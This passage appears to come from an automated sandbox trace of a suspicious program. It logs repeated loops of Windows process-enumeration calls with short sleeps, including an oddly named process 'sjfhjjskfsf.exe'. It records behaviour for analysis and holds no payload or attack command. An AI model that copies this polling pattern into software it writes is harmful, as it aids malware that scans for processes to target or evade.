szExeFile="explorer.exe")) returned 1 [0216.092] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0216.093] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0216.093] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.093] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0216.094] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0216.094] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0216.094] Process32NextW (in: hSnapshot=0x180, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0216.095] Sleep (dwMilliseconds=0x64) [0216.233] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x184 [0216.235] Process32FirstW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.235] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0216.235] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0216.236] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.236] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0216.236] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.237] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0216.237] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0216.237] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0216.238] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0216.238] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.238] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.239] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.239] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.239] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.240] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0216.240] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.240] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.241] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0216.241] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0216.241] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.242] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0216.242] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0216.242] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.243] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0216.243] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0216.243] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0216.244] Process32NextW (in: hSnapshot=0x184, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0216.244] Sleep (dwMilliseconds=0x64) [0216.373] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188 [0216.374] Process32FirstW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.375] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0216.375] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0216.375] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.376] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0216.376] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.376] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0216.377] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0216.377] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0216.377] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0216.378] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.378] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.378] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.379] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.379] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.379] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0216.380] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.380] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.380] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0216.381] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0216.381] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.381] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0216.382] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0216.382] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.382] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0216.383] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0216.383] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0216.383] Process32NextW (in: hSnapshot=0x188, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0216.384] Sleep (dwMilliseconds=0x64) [0216.488] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18c [0216.490] Process32FirstW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.490] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0216.491] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0216.491] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.491] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0216.492] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.492] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0216.492] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0216.493] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0216.493] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0216.493] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.494] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.494] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.494] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.495] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.495] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0216.496] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.496] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.497] Process32NextW (in: hSnapshot=0x18c, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) 